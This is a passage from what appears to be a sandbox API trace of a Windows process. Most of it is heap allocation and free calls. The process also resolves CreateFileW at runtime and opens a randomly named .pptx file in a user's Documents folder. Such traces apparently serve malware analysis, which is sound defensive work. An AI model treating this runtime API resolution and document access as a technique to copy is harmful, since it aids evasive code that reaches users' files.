0x43cacb8 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.160] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0079.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.162] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0079.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cad48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.163] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.163] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\g_xt5mjguhk8nmh4f.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.165] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.165] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.167] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.167] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.167] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, 